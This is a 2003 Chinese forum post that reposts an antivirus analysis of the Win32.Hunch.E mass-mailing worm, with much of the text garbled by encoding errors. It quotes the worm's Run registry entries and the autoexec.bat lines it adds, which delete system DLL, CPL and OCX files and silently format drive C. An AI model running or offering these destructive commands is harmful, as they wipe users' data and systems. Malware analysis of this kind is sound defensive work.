 |
| 等 级:长老 |
| 经 验 值:845 |
| 魅 力 值:355 |
| 龙 币:684 |
| 积 分:720.7 |
| 注册日期:2002-10-25 |
| |
|
|
|
随便找了个蠕虫的分析,看看nat能不攮能防?这样的dd满地都是
病毒名称:Win32.Hunch.E
?牐牨鹈?:WORM_HUNCH.A, Win32/Hunch.A1, W32.Hunch.E@mm
?牐牪《纠嘈停篧in32蠕虫
?牐犖:?级别:中
?牐牬?播速度:慢
?牐?
?牐牸际跆卣鳎?
?牐牳萌涑婊崂?用Outlook向地址簿中的所有联系人发送病毒邮件,其邮件正文为:“Mensaje importante para [recepient name] en el archivo adjunto...”。但没有附件,主题行也是空的。
病毒运行后,会显示图片
此蠕虫会删除由其随机选择的扩展名的文件,并且将日志保存存在“系统”目录下的ListWin.txt文件里,
?牐?
?牐犉渲斜簧疚募?的扩展名从以下随机选取:
?牐燲LS, DOC, WAV, ASM, MPG, BAT, CDX, JPG, HTM, HLP, CHM, RPG, GIF, SCR, TTF, MID, MDB, DBF, ICO
?牐?
?牐犓?也会修改注册表来运行其病毒副本:
?牐燞KLMSoftwareMicrosoftWindowsCurrentVersionRunSALSA = "%SYSTEM%SALSA.EXE"
?牐?
?牐燞KLMSoftwareMicrosoftWindowsCurrentVersionRunServices = "%SYSTEM%SALSA.EXE"
?牐牬送猓?蠕虫还会添加如下代码到自动批处理文件autoexec.bat:
?牐燖echo off
?牐燚EL C:WINDOWSSYSTEM*.CPL
?牐燚EL C:WINDOWSSYSTEM*.DLL
?牐燚EL C:WINDOWSSYSTEM*.OCX
?牐燙LS
?牐燜ORMAT C: /u /v:SALSA /autotest
?牐燙LS
?牐?
?牐犚虼耍?它还可能格式化C盘。
|
| |
|
|
2003-09-08 15:10:24
